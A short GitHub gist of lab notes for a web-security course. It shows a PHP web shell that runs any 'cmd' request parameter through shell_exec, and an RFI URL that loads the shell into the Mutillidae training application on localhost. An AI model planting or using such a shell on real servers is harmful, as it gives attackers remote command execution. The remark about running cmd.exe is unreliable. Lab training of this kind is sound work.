Last active
January 28, 2018 17:03
-
-
Save mosesrenegade/be8dfe268fabd96d6c3ed1c30561960a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
In SANS SEC542, we use a backdoor PHP shell. The excersize uses RFI to include a text copy of the php code into multilidae. Here is how you can 'enhance it'. | |
Write to a webhost: | |
nano /var/www/html/id.txt | |
Inside of id.txt we have some helper functions to debug: | |
<?php | |
echo "<pre>"; | |
echo "This is the symbol table:"; | |
echo var_dump($_REQUEST); | |
echo "Commands:"; | |
echo shell_exec($_REQUEST['cmd']); | |
echo "</pre>"; | |
?> | |
If you copy this into a txt file you can then execute the following command: | |
http://multillidae/index.php?page=http://127.0.0.1/id.txt&cmd=ls | |
This would result in running cmd.exe. Not the http://127.0.0.1 is because we are running in our local host to our own target. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment